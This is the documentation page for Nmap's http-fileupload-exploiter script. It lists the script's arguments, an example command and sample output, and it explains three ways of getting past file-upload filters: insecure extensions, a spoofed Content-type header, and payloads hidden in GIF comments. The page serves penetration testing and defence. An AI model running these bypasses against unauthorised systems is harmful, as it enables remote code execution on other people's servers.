Script http-fileupload-exploiter

Script types: portrule
Categories: intrusive, exploit, vuln
Download: https://svn.nmap.org/nmap/scripts/http-fileupload-exploiter.nse

Script Summary

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.

Script Arguments

http-fileupload-exploiter.fieldvalues

The script will try to fill every field found in the upload form but that may fail due to fields' restrictions. You can manually fill those fields using this table. For example, {gender = "male", email = "foo@bar.com"}. Default: {}

http-fileupload-exploiter.formpaths

The pages that contain the forms to exploit. For example, {/upload.php, /login.php}. Default: nil (crawler mode on)

http-fileupload-exploiter.uploadspaths

Directories with the uploaded files. For example, {/avatars, /photos}. Default: {'/uploads', '/upload', '/file', '/files', '/downloads'}

slaxml.debug

See the documentation for the slaxml library.

httpspider.doscraping, httpspider.maxdepth, httpspider.maxpagecount, httpspider.noblacklist, httpspider.url, httpspider.useheadfornonwebfiles, httpspider.withindomain, httpspider.withinhost

See the documentation for the httpspider library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

Example Usage

nmap -p80 --script http-fileupload-exploiter.nse <target>

This script discovers the upload form on the target's page and
attempts to exploit it using 3 different methods:

1) At first, it tries to upload payloads with different insecure
extensions. This will work against a weak blacklist used by a file
name extension verifier.

2) If (1) doesn't work, it will try to upload the same payloads
this time with different Content-type headers, like "image/gif"
instead of the "text/plain". This will trick any mechanisms that
check the MIME type.

3) If (2), doesn't work, it will create some proper GIF images
that contain the payloads in the comment. The interpreter will
see the executable inside some binary garbage. This will bypass
any check of the actual content of the uploaded file.

TODO:
* Use the vulns library to report.

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
|   Testing page /post.html
|
|     Successfully uploaded and executed payloads:
|      Filename: 1.php, MIME: text/plain
|_     Filename: 1.php3, MIME: text/plain

Requires

• http
• io
• nmap
• string
• httpspider
• shortport
• stdnse
• table

---

Author:

• George Chatzisofroniou

License: Same as Nmap--See https://nmap.org/book/man-legal.html